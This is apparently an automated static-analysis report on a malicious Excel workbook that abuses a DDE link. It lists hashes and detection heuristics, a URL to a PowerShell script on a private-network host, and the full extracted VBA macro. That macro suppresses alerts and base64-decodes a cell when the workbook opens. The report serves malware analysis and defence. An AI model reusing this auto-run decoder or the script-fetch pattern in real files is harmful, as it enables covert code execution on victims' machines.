Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4ec643c25d2d04a7…

MALICIOUS

Office (OOXML)

15.6 KB Created: 2021-03-14 02:05:13 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-04-01
MD5: 7621bcb86f722a3bc8b6ace1a30c87e8 SHA-1: f279f5ee89919d2f0761111b1079e2eadbcb7df8 SHA-256: 4ec643c25d2d04a7f9ba90a98978a0b25ff1a057b96cecf610b948f497b4a0e1
190 Risk Score

Heuristics 6

  • ClamAV: Xml.Exploit.DDE_Abuse-9987933-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xml.Exploit.DDE_Abuse-9987933-1
  • Spreadsheet DDE link launches a dangerous command critical OOXML_SPREADSHEET_DDE_MALICIOUS
    Excel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        With CreateObject("Microsoft.XMLDOM").createElement("baysesixtyfor")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.1.17/test.ps1 In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1207 bytes
SHA-256: 79d1f1a8bb79fff7444b34389dbbc0a9c5559ed441fd8ac72e0e441aeeab4462
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function DB64(baysesixtyfor$)
    Dim base
    With CreateObject("Microsoft.XMLDOM").createElement("baysesixtyfor")
        .DataType = "bin.base64": .text = baysesixtyfor
         base = .nodeTypedValue
   End With
    With CreateObject("ADODB.Stream")
        .Open: .Type = 1: .Write base: .Position = 0: .Type = 2: .Charset = "utf-8"
        DB64 = .ReadText
        .Close
    End With
End Function
Private Sub Workbook_Open()
Dim PatayinAngAlert As Boolean
PatayinAngAlert = False
Application.DisplayAlerts = PatayinAngAlert
Range("A1").Value = DB64(Range("A1").Value)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 15872 bytes
SHA-256: 5735162aad2199d175a654747ab2f15a14e9ed9cf7084c721708bccacdfcce6f